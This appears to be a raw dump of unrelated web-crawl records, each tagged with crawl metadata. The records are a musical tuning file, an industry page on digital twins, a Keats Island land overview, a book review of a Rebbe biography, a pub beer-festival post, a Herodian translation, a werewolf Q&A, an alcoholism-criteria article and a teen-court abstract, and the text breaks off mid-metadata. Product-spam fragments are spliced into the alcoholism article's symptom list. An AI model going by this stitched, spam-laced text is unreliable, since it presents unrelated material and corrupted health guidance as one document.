No comments: | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '3', 'language_id_whole_page_fasttext': "{'en': 0.9808183312416076}", 'metadata': "{'Content-Length': '58545', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:GGNUCBU3IBPKS2WGPCPOVLC2TZPRVT4A', 'WARC-Concurrent-To': '<urn:uuid:f1062d27-ed8f-414c-900a-fa4d94c063f0>', 'WARC-Date': datetime.datetime(2017, 10, 18, 7, 26, 59), 'WARC-IP-Address': '172.217.12.225', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:YTNHBXFCAP4EQAAQ3ANN5IYZT6DEKY3D', 'WARC-Record-ID': '<urn:uuid:5eef318b-8b81-4240-b0b8-7911c349e403>', 'WARC-Target-URI': 'http://thegreatsimpleton.blogspot.com/2008/02/daniel-hannan-on-today.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:bd9c0cd6-86cc-4622-8952-23984aa69ed3>', 'WARC-Truncated': None}", 'previous_word_count': '235', 'url': 'http://thegreatsimpleton.blogspot.com/2008/02/daniel-hannan-on-today.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-165-76-76.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-43\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for October 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.030705809593200684', 'original_id': '9fdbdc7baa71d88b6f8e80710f615d5fbf179b1cb035a706dc2459e360e69ebd'} |
// smithgw_bifrost.scl
//
// Six meantone fifths, four pure, two of sqrt(2048/2025 sqrt(5))
//
@60
:intervals
261.6255653006
275.07759559501
292.50627485027
311.03921839762
327.03195662575
349.91912034749
366.77012764335
391.22147055517
413.66634097248
437.39889945791
466.55882736321
489.02683710225
523.2511306012
| mini_pile | {'original_id': 'faf7055c9520afa6d7c292d30473ca6e72cce31b0cbadff44053290d45514a39'} |
Digital Twin
Digital Twin is a virtual representation that matches the physical attributes of a “real world” factory, plant, product or component in real time, with sensors, cameras, and other data collection techniques. In other words, Digital Twin is a live digital model that is used to drive business outcomes. Through Confirm Companies can implement Industrial IoT Digital Twins to enable them to evaluate production decisions based upon analytics, visualize products performing in their environments or being used by actual people in real-time, thus gaining control over complex processes and systems-of-systems, and other important manufacturing insights.
Key Research Questions
1. Evaluate production decisions based upon analytics
2. Connect separate systems/processes for improved tracking
3. Troubleshooting equipment in remote locations
4. Gain control over complex processes and systems-of-systems
Scientific Challenges
1. Accurate representation and capturing of physical environment
2. Connect separate systems/processes;
3. Realtime modelling of complex processes
Targeted Industry Sectors
1. Med Tech
2. Pharma
3. Engineering
Key Industry Impacts
1. Optimise efficiency by predicting failures and inefficiencies in production in real-time
2. Develop new products with insights based upon the behaviour of existing products or processes in the real world
3. Reduced service costs
Key Enabling Technologies
1. Networking Systems & IOT
2. Sensors, wireless sensor networks
3. Robotics & Control
4. Data Analytics
Business Drivers
Better capture of real time information, and actuation of response, potential for improved Product and Process design, shorter time to market.
Privacy Settings
• wordpress_test_cookie
• wordpress_logged_in_
• wordpress_sec
• __cfduid
Decline all Services
Accept all Services | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '82', 'language_id_whole_page_fasttext': "{'en': 0.8277782201766968}", 'metadata': "{'Content-Length': '118504', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:K5R4UFVOUK2FJDIN63XDKZA4HNQW5XS6', 'WARC-Concurrent-To': '<urn:uuid:3179ff64-aba5-4cd6-837b-60be7a339f77>', 'WARC-Date': datetime.datetime(2020, 7, 16, 0, 18, 54), 'WARC-IP-Address': '104.18.60.1', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:2THGVXAEGQY6IGGGXTHHJLCFW5KOQII3', 'WARC-Record-ID': '<urn:uuid:7977f584-8002-4ce9-af89-b21b1f9f596e>', 'WARC-Target-URI': 'https://confirm.ie/case_studies/digital-twin/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:d4ecd1be-68dc-4440-a721-da75e9911293>', 'WARC-Truncated': None}", 'previous_word_count': '364', 'url': 'https://confirm.ie/case_studies/digital-twin/', 'warcinfo': 'isPartOf: CC-MAIN-2020-29\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-144.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.04155862331390381', 'original_id': '75c6cbec4ec28cfbe27576c223380be699ad13f96ffd4a0a2a412affd4bf959f'} |
keats island
Keats often seems undeveloped. There are pockets of habitation, including Eastbourne, Melody Point and around Keats Camp, but a lot of it is empty. We have trails that traverse much of the rest of the Island, but many of those trails are on private land. Here is an overview of the land and trails on Keats.keats-map(trail)
Eastbourne is comprised of 220 small, privately owned lots and most have a cottage or house on them. There are about 30 – 40 full time residents in Eastbourne and that number is growing. In the summer months there could easily be 300 – 400 people in Eastbourne, especially on a long weekend. Eastbourne has a community water system, firefighting equipment and a dock. The community has a number of beaches, some of which are designated parkland such as West Beach. There are no services in any of the parks and the community maintains stairs and paths to the various beaches.
10 Acres:
To the north and west of Eastbourne are a number of 10 acre parcels that are all privately owned. Most have residences on them, although some are used as woodlots or are unoccupied. They surround the 33 acre park. Six are waterfront properties – 3 on the north end and 3 on the south end (adjacent to Andy’s Beach). Private wells provide water to these properties._JB35557
North Coast:
There are approximately 25 lots on the north of the Island between Barnabas Camp and Cotton Point. They all have narrow water front and can be accessed by water or on foot. These properties are not connected to the Hydro grid.
Melody Point:
A number of cabins surround Melody Point between Barnabas and Plumper Cove Provincial Park. They are mainly water access, although the Barnabas Road does link up to some of them. They have a self-managed water system and common uphill property.
Plumper Cove properties:
There are a number of water front properties between Plumper Cover Marine Park and the Keats Camps leaseholders. These properties are mostly long and narrow, extending well up towards Highest Peak. There is a well-established trail running behind these properties to Plumper Cover and Islands Trust is working on getting this trail dedicated as parkland. For the most part, these properties are foot or water access only.
_JB38572Plumper Cove Marine Park:
This provincial park is accessible only by water or by foot. The park has numerous mooring buoys and anchoring spots and is a popular weekend anchorage during boating season. There are a number of camp spots for hikers, kayakers or others dropped off by boat. There are hiking trails, outhouses and a few pumps for fresh water. (
A Christian family camp emphasizing family summer retreats and adult retreats in off season. It encompasses a farm and a number of new and older camp buildings. In the summer the camp has the only “store” on the Island, open most of the week and serving ice cream and other treats, which is very popular on a hot summer’s day. (
Keats Camps:
This summer camp, run by the Baptist Convention, is the largest on the Islands Trust islands; accommodating as many as 450 people on busy weekends. The Baptist Convention owns all the land that encompasses the camp, as well as all the land where the Keats leaseholders have cottages and all the land out to Salmon Rock. Effectively, the whole south/west part of the Island is their property. They have many services including sewage, water, roads and access to the Keats Landing dock. (
_JB35286Keats Landing leaseholders:
There are 100 plus cabins surrounding Keats Camps to the north, to the south and on the west near the Camps’ water centre (Hard to Come By Cove). These cabins are all subject to leasehold agreements with the Baptist Convention. There is a plan that has been in the works for a number of years to subdivide and sell these properties privately. If that occurred, Keats Landing would have the second largest concentration of landowners after Eastbourne. Keats Landing has an active Leaseholders Association, firefighting, docks, trails and some roads. They are tied into the camp for some services.
Corkum properties:
The remainder of the Island (approximately 300 Acres in the center) is owned by the Corkum family. It is held primarily as a wood lot and there is one residence on one of the three large properties. Some of the property is shared with Barnabas, but most of it is intact forest with some selective logging and some gravel extraction. The land includes some of the most stunning parts of the Island, including Wandering Trail, Pebble Beach, Bridgeman’s Bluff and the trail to Highest Peak.
_JB30641Part of the challenge for future conservation on Keats Island will be appropriate planning for this property in the future. Access to special Keats places that are on this land is a big priority for the KICG. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.966890275478363}", 'metadata': "{'Content-Length': '57647', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:BTFIO42BPJFIXKXVMFO7T4ENVORZW2T5', 'WARC-Concurrent-To': '<urn:uuid:acdd2864-34cb-4def-a7b8-6487f44dec2c>', 'WARC-Date': datetime.datetime(2021, 6, 18, 15, 3, 34), 'WARC-IP-Address': '192.0.78.24', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:NOHSLKOKW6N6CLEQ3YDNNAUKUIMT62KL', 'WARC-Record-ID': '<urn:uuid:c4b1026e-38c1-4e15-86aa-99435691bf14>', 'WARC-Target-URI': 'https://keatsislandconservation.com/keats-island/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:c759d634-6472-4b78-a4ab-b866b7a4ca36>', 'WARC-Truncated': None}", 'previous_word_count': '805', 'url': 'https://keatsislandconservation.com/keats-island/', 'warcinfo': 'isPartOf: CC-MAIN-2021-25\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-232.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.023775756359100342', 'original_id': '7749fee65eedf3e33902791625b89d5b68c9a335411294579cf0c0eb16315ef8'} |
Monday, December 22, 2014
Follow us:
The Book Reader: 'Rebbe'
• Text size: + -
TWC News: The Book Reader: 'Rebbe'
Play now
Time Warner Cable video customers:
Sign in with your TWC ID to access our video clips.
out of 10
Free Video Views Remaining
To view our videos, you need to
enable JavaScript. Learn how.
install Adobe Flash 9 or above. Install now.
Then come back here and refresh the page.
I’m Bari Weiss of the Wall Street Journal, and up next on the Book Reader: the most important rabbi of the 20th century."
A few years ago I was out for a jog in Prospect Park when two teenage boys in black hats raced to catch up with me. "Are you Jewish?” they asked, out of breath. They wanted to offer me candles to light on the Sabbath.
If you live in New York and look the part—or even if you don’t!—chances are you've had a similar experience.
Who are these enthusiastic Jews? And why are they so intent on seeking out their co-religionists?
They are members of a Hasidic sect called Chabad, a movement founded in the late 1700s in White Russia that emphasizes seeking God through concrete actions like passionate prayer and good deeds above Torah study. And the goal of these young emissaries is to expose Jews to Judaism —unconditionally.
As for why they are so passionate and tireless? Well that has a lot to do with their leader, arguably the greatest rabbi in modern history: Menachem Mendel Schneerson, known widely as the Rebbe. This year is the 20th anniversary of the Rebbe’s death, and a moving new biography by Joseph Telushkin goes a long way to explaining how he turned a religious sect decimated by the Holocaust into the most thriving Jewish organization in the world, with thousands of Chabad emissaries spreading Judaism to places as far-flung as Katmandu and the Congo.
I won’t try to sum up the Rebbe’s life in the space of a few sentences, but here are a few interesting facts about him: He almost never left Crown Heights. He spoke seven languages and could read more than ten. He barely slept, and only ate dark chocolate while he worked, and would meet with petitioners until the wee hours of the morning. He lived by the idea that anything worth doing is worth doing now.
People as diverse as Ronald Reagan and Bob Dylan sought his counsel. And just last year, on the night before his election to the Senate, New Jersey’s Cory Booker went to the Rebbe’s grave to pray.
To understand why he inspired so many, do yourself a favor and pick up this biography. You don't need to be a Jew or even be a religious person to learn from this monumental man. ClientIP:, UserAgent: CCBot/2.0 ( Profile: TWCSAMLSP | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '59', 'language_id_whole_page_fasttext': "{'en': 0.9383768439292908}", 'metadata': "{'Content-Length': '100290', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:RSLHTJML63WKNZFAHYAPZWYWPY6T6RTB', 'WARC-Concurrent-To': '<urn:uuid:ba60efab-5800-4993-b4b3-1a6c1ce147eb>', 'WARC-Date': datetime.datetime(2014, 12, 22, 23, 10, 11), 'WARC-IP-Address': '23.0.160.35', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:25ARD7OZNZHACOAZQ6F7Y7ZMRE6NLXFI', 'WARC-Record-ID': '<urn:uuid:58482cd6-1c57-4192-9a39-13b3009f510a>', 'WARC-Target-URI': 'http://www.ny1.com/content/lifestyles/the_book_reader/210338/the-book-reader---rebbe-', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:99e986dc-155f-4cdd-a9af-fbaaada24e08>', 'WARC-Truncated': None}", 'previous_word_count': '565', 'url': 'http://www.ny1.com/content/lifestyles/the_book_reader/210338/the-book-reader---rebbe-', 'warcinfo': 'robots: classic\r\nhostname: ip-10-231-17-201.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-52\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for December 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.04098153114318848', 'original_id': '53f0545eed01f6b99d46a1ea1909c3b67c912ccd2280ea04dfd87ea88c1c5b01'} |
Skelly’s held their second Beer Festival in Ballymahon yesterday. They had beers from St Mel’s, Black Donkey, Soulwater and Franciscan Well pouring.
I started off with Black Donkey’s Western Warrior. It’s a straight up Lager with none of your fancy dry hopping or any of that kind of jazz. And you know what? T’is grand.
St Mel’s launched their 2016 Autumn IPA at the festival. Their new assistant brewer Mark Connolly chose the hops for this one and he went with Ahtanum, Liberty and Crystal. It made for an easy drinking IPA, good job Mark!
Sean Colohan gave me a taste of his Mango Sour homebrew which was really good but had the unfortunate side effect of throwing my palate off for the next beer. ( Would someone please give Sean a brewery? Cheers! ) Soulwater had their brand new Bulletproof IPA and it took me a few sips to get into it but damn it’s a good ‘un. Fair play Shane!
Shane had also brought Buxton’s Imperial Black IPA and it was a big toasty, strong, black coffee type of a beast. A nigh perfect finisher. Great night in Skelly’s and you can find some of those beers in the bar on a regular basis so it’s always worth calling in if you’re passing through Ballymahon. Sláinte! | mini_pile | {'original_id': 'c12557d68df1b07fd4331fcd89ea185c9cd2cd22f1cf1d6878224eb032f3be32'} |
Herodian 3.12
End of Plautianus
[3.12.1] [205] Agreeing to those proposals, the tribune made his customary rounds through the entire imperial palace without interference. But knowing that it would be impossible for him to kill two emperors, especially since they were housed in different parts of the palace, Saturninus stood outside the bedroom of Severus and, summoning the imperial household guards, demanded to be taken to the emperor so that he might give him information involving his safety. The guards reported the matter to Severus and were ordered to bring the tribune before him.
[3.12.2] The tribune approached the emperor and said: "I have come to you, Master, as the man who sent me well knows, to be your assassin and murderer, but I hope and pray that I will be instead your benefactor and savior. Plautianus, scheming to seize the empire, ordered me to murder you and your son, and he issued this order not in words alone but in writing. This memorandum is my witness. I undertook the assignment because I was afraid that if I refused it he would entrust the task to someone else, and I have come here to disclose these matters to you so that his intrigues may not remain undetected."
[3.12.3] But even though Saturninus made these charges with much weeping, Severus was not immediately convinced. On the contrary, since he had great affection for the prefect, he suspected that the affair was a trick of some sort to deceive him; he believed that his son, in his hatred of the prefect and his daughter, had contrived a slanderous and fatal plot against the man.
[3.12.4] The emperor therefore sent for his son and reprimanded him for having devised such a scheme against a man kindly disposed toward the emperor and his intimate friend as well. At first Caracalla swore on his honor that he knew nothing about what the tribune was saying; but when the man insisted and produced the memorandum, the young emperor encouraged him, urging him to prove the truth of his charges. Realizing his danger and fearing the emperor's affection for Plautianus, the tribune now knew that if the plot remained confused and unproved, he could expect a death that would not be accidental.
[3.12.5] "Master," he said, "do you wish stronger proof or clearer evidence of some sort? Then allow me to go to the front of the palace and reveal to one of the men loyal to me that the murder is done. Trusting me, Plautianus will come here in the belief that he is occupying the deserted palace. When he arrives, it will be your task to discover the truth. Order complete silence about the palace so that the plan may not be upset by being previously discovered."
[3.12.6] After making this proposal, the tribune ordered one of his most trusted men to carry a message to the prefect telling him to come to the palace as quickly as possible. The messenger was to say that both emperors were dead, and it was imperative that the prefect be inside the palace before the news was reported to the people. Then, with the Palatine Hill in his hands and the succession already settled, all the Romans, willingly or unwillingly, would offer allegiance not to an emperor to be chosen but to one already established.
[3.12.7] Believing this message, and with high hopes, Plautianus, though it was late at night, put on a breastplate beneath his robe for protection, mounted a chariot, and drove to the palace at top speed, accompanied by a few friends who were with him when the messenger came and who thought that he had received an emergency summons from the emperors.
[3.12.8] Plautianus entered the palace unchallenged, since the guards were unaware of what was taking place. The tribune came forward to meet the prefect and set a trap for him: saluting Plautianus as emperor and taking him by the hand in the customary fashion under the circumstances, Saturninus led him into the bedroom where he said the bodies of the emperors had been thrown.
[3.12.9] Severus had already alerted some of the younger bodyguards to seize the prefect as he entered the room. Then Plautianus, who had expected a far different reception, was caught and held fast. When he saw both emperors standing before him, he was terror-stricken, and pleaded with them, trying to defend himself and swearing that it was all a mistake, a plot, a conspiracy against him.
[3.12.10] When Severus reproached him with the many favors he had done him and the many honors he had awarded him, and Plautianus in his turn reminded the emperor of his previous loyalty and good will, Severus was beginning to believe the prefect until his robe fell open and revealed the breastplate beneath it. When he saw the armor, Caracalla, who was bold and quick to act and naturally hated the man, spoke up: "How would you explain these two facts?
[3.12.11] First, that you came unordered to your emperors at night, and second, that you came here wearing that breastplate? Who goes to a feast or a revel in full armor?" After saying this, Caracalla ordered the tribune and the other praetorians present to draw their swords and kill this proven enemy.
[3.12.12] Obeying without delay the young emperor's orders, they killed Plautianus and threw his body into the street, so that the affair might be clear to all and he would be vilified by those who despised him. Such was the fate of Plautianus, who, maddened by his greed to have everything, was betrayed in the end by a faithless subordinate.note | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '106', 'language_id_whole_page_fasttext': "{'en': 0.9825618863105774}", 'metadata': "{'Content-Length': '23183', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:KEBIX47KEOO45XWP2OGB3CPBQYPDIBWQ', 'WARC-Concurrent-To': '<urn:uuid:03a777f7-b26f-4501-9992-65c67d627952>', 'WARC-Date': datetime.datetime(2021, 1, 23, 4, 58, 44), 'WARC-IP-Address': '104.21.8.178', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:62E53A7YBC3JVSKWBYQTUYLJHFFZHVSQ', 'WARC-Record-ID': '<urn:uuid:b4a710fa-5c1c-48a0-9759-be1d5942f239>', 'WARC-Target-URI': 'https://www.livius.org/sources/content/herodian-s-roman-history/herodian-3.12/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:2dd293e4-f351-4b51-b70c-d7b95ff6c9f8>', 'WARC-Truncated': None}", 'previous_word_count': '1005', 'url': 'https://www.livius.org/sources/content/herodian-s-roman-history/herodian-3.12/', 'warcinfo': 'isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-32.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.032146990299224854', 'original_id': 'f5e5ec580a96fbdc54f4b9eb236d956eb76d925542cdd3c7112e68dc1b38ffa2'} |
Do Werewolves Exist?
Throughout my life I’ve always wondered if they exist. I probably sound really dumb asking a question like this, but a few friends of mine claim that they are lycanthropes, or can turn into a wolf, saying it also runs through their blood.
My good friend wants to become one so she does spells, like some she found on the internet.
She wants to become one, but I’m not sure if it’s possible or if they even exist.
What are they exactly?
Asked by Sora
Werewolf Hunting source –
Werewolf Attack Woodcut By Lucas Cranach the Elder – Gotha, Herzogliches Museum (Landesmuseum), Public Domain,
1. Thats an interesting question. I suppose what you might call werewolves do exist, many people actually believe they do turn into wolves and other animals and commit murders, cannibalism and so on. A very good book on the subject is Sabine Baring-Goulds Book Of Werewolves. He tells of the old legends and true accounts of people who thought they could turn into animals. You might want to check it out.
2. Hi Sora,
To become a werewolf, according to legend, you have to be bitten by another werewolf. There is no spell I know that can make this transformation.
Also, again, according to legend, when a person transforms into a werewolf they have no control of their human mind anymore, and become a beast. It’s not like they are represented on TV programs, going around saving the world .. they are more likely to return to their family home and kill their family, or friends, or anyone else that crosses their path.
So Please, tell your friend to find another hobby .. something that won’t hurt others unintentionally.
In the meantime, there is a disease called Lycanthropy which, as Gary mentions above, means that a person ‘believes’ they turn into a werewolf when the moon is full, but they actually don’t.
Love & Peace
Leave a Reply | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9636014103889464}", 'metadata': "{'Content-Length': '39257', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:YFX76DED3JOSK352S5UIBJL23V3T47DV', 'WARC-Concurrent-To': '<urn:uuid:dc3e76a8-4559-4f82-92e7-3f93dda23176>', 'WARC-Date': datetime.datetime(2021, 1, 23, 13, 29, 3), 'WARC-IP-Address': '204.197.248.61', 'WARC-Identified-Payload-Type': 'application/xhtml+xml', 'WARC-Payload-Digest': 'sha1:CPULWQ3WNH3C63WPEDYR4VLZ5BJKNMOD', 'WARC-Record-ID': '<urn:uuid:b9836a89-331e-4151-8fdc-8a16225f3e9e>', 'WARC-Target-URI': 'http://www.paranormalqa.com/do-werewolves-exist/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:b9f0b1e5-96fb-410b-922b-1c1e4e2ae0ea>', 'WARC-Truncated': None}", 'previous_word_count': '321', 'url': 'http://www.paranormalqa.com/do-werewolves-exist/', 'warcinfo': 'isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-226.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.13152223825454712', 'original_id': 'e865e14837f522ad65ab91e731ad9aeaf99d23e3079660da84eb96f9faaf0d53'} |
When someone you know has a drinking problem, you might wonder at what point he or she would be considered an alcoholic or someone with an alcohol addiction. Precisely defining those terms can be difficult.
Stephen Gilman, MD, an addiction specialist in New York City, said that alcohol addiction is a broad term. Medically, psychiatrists look at alcohol abuse and alcohol dependence in different ways. In contrast to alcohol abuse, people with alcohol dependence experience physical withdrawal symptoms when they stop drinking. As Dr. Gilman pointed out, “Dependence includes everything that defines abuse plus physical dependence, tolerance, and withdrawal.”
Alcoholism: Understanding Abuse
Medical experts consider abuse to be the regular use of a substance that leads to serious psychological and/or physical disability. If the person demonstrates one or more of the following during the same year, he or she is considered to be a substance abuser:
• Repeated substance use to the point of not being able to meet responsibilities — not performing well at work, being suspended from school, being repeatedly late or absent from required duties, or neglecting household tasks.
• Casual Co New Clothing Dress Boutique York winter U0FZSA
• and Pullover Cinder Cashmere Heather Wool Hoodie Repeated substance use when there is risk involved, like operating equipment or driving a car while under the influence.
• Repeated difficulties with the law related to substance use — being arrested for physical aggression or drunk driving, for instance.
• Insisting on using the substance regardless of continued or repeated personal or social difficulties because of it, verbal or physical aggression with a loved one, or frequent arguments about the substance use.
Alcoholism: Understanding Dependence
When heavy alcohol use leads to an actual physical need to drink, people are said to have alcohol dependence. Dependence is defined as habitual use leading to significant psychological/physical impairment demonstrated by three or more of the following within the same year:
• Needing greater amounts of alcohol to satisfy cravings.
• Going through withdrawal when not using alcohol, with symptoms such as tremors, restlessness, and agitation.
• Taking the substance or a similar one to avoid the effects of withdrawal.
• Using the substance longer than planned or more frequently and in greater amounts.
• An inability to reduce use, despite a sincere wish to do so.
• Spending a significant amount of time trying to acquire the substance.
• Spending less time at work or on other activities because of substance use; a person may completely abandon previously enjoyable activities.
• Continuing to drink despite being aware that alcohol is causing psychological or physical difficulties.
Alcoholism: Severity Differences and Signs
James Garbutt, MD, professor of psychiatry at the University of North Carolina at Chapel Hill and a researcher at the Bowles Center for Alcohol Studies, said that a person can experience many alcohol-related problems, or just two or three, and nevertheless be considered an alcoholic. “One can drink four to five beers and meet diagnostic criteria, or drink two fifths of bourbon a day and meet the criteria.”
The more problems a person has in his daily life, the more severe the addiction. To determine the severity of alcohol addiction, Gilman said to ask yourself the following questions:
• Does he frequently say inappropriate things?
• Is his balance off when he walks?
• Is his speech often slurred?
• Is he often noticeably drunk?
• Does he miss work?
• Has he gotten into trouble with the law for drinking and driving?
• Is he having health issues related to alcohol addiction, such as heartburn, liver problems, high blood pressure, or insomnia?
Alcoholism: Looking in the Mirror
If you suspect that you have a drinking problem, there are steps you should take right away. “The CAGE is a brief questionnaire that you can take to help determine if you have a problem with alcohol,” explained Dr. Garbutt. If the answer to two or more of the four CAGE questions is yes, it is likely you have a problem.
• C stands for cut-down: Do you ever feel that you should cut down on your drinking?
• A stands for annoyed: Have people annoyed you by criticizing your drinking?
• G stands for guilty: Have you ever felt guilty about your drinking?
• E stands for eye-opener: Have you ever had to drink as soon as you wake up to steady your nerves or get over a hangover?
Gilman also suggested adding these additional questions to the list: Is your drinking causing you problems in any area of your life? Do you use alcohol despite repeated negative consequences in your relationships, at work, and with the law? “Any negative consequences in just one area of your life, regardless of how much or how often you drink, are cause for concern and an indication that you need the help of a professional,” he explained.
If you feel like you have to drink or drink too much at a time, or even if you meet only one of the CAGE criteria, you should seek professional help. Ask your doctor to refer you to a therapist who specializes in addiction.
Don't wait any longer — now's the time to start taking control of your life and feeling good about yourself again. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '10', 'language_id_whole_page_fasttext': "{'en': 0.9523504376411438}", 'metadata': "{'Content-Length': '278477', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:GHAILZXCN4LGIYMROTWGOSFHJKFCWWOU', 'WARC-Concurrent-To': '<urn:uuid:ff267bdf-ba90-45d5-9ae7-051e065d6b8c>', 'WARC-Date': datetime.datetime(2019, 3, 22, 8, 50), 'WARC-IP-Address': '78.46.47.18', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:VL323XWAETQO4WFCPNQUNVPLRV6LDKAG', 'WARC-Record-ID': '<urn:uuid:29979ded-4f20-4eb9-9c33-ccb994581187>', 'WARC-Target-URI': 'http://fashionmudra.com/tn', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:48fe449f-d02a-4ceb-bae0-4e46e0b60ad4>', 'WARC-Truncated': None}", 'previous_word_count': '845', 'url': 'http://fashionmudra.com/tn', 'warcinfo': 'isPartOf: CC-MAIN-2019-13\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-123-157-4.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.020022153854370117', 'original_id': 'bc518896b765a1e26d7ca9840b769b8cf20f0d2dc6fc1ba315df4c0b83bfb92c'} |
Source: (2002) Behavioral Sciences and the Law. 20: 381-392.
Among the rise of specialty courts, teen courts show promise as a community-based approach to youth crime, write the authors of this article. Teen courts typically deal with first time, non-violent offenders who have admitted their guilt. In teen courts, youth volunteers may serve as attorneys, jurors, and bailiffs. Some jurisdictions have local attorneys as judges; some even have youth acting as judges. Generally, sentencing is done by the youth jury. The guiding principle is that youth will be more responsive to the disapproval of their peers than to disapproval or sanctions from an adult legal system. However, there have not been careful evaluations of the effectiveness of teen courts. In this context, the authors propose a therapeutic jurisprudence approach for evaluation of such courts. In essence, a therapeutic jurisprudence would examine whether participation in teen courts has general beneficial or therapeutic effects on youth. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '1', 'language_id_whole_page_fasttext': "{'en': 0.9534823894500732}", 'metadata': "{'Content-Length': '22809', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:N6DJV47I5BWLADZZBKLQSFKQNRPI6QZK', 'WARC-Concurrent-To': '<urn:uuid:215e187f-c70b-4f06-b9c5-0f9399e84edc>', 'WARC-Date': datetime.datetime(2019, 4, 22, 6, 13), 'WARC-IP-Address': '45.79.6.24', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:L7EC2ZIIOSZFM2FEUCKWM76EFNY73V42', 'WARC-Record-ID': 